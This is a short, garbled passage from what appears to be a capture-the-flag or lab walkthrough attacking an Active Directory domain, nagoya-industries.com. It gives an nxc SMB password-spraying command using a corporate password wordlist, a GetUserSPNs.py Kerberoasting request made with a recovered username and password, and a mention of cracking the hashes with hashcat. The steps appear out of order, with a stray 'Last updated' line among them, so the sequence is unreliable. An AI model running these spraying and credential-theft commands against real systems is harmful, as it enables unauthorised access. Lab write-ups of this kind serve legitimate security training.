nxc smb 192.168.182.21 -u users.txt -p /usr/share/seclists/Passwords/common_corporate_passwords.lst
Now kerberoasting:
GetUserSPNs.py nagoya-industries.com/Fiona.Clark:Summer2023 -request
Last updated 4 days ago
We can find the website and it has a list of team members:
Now we can add this to a users.txt and bruteforce for passwords:
Now we get the password.
We can crack it with hashcat
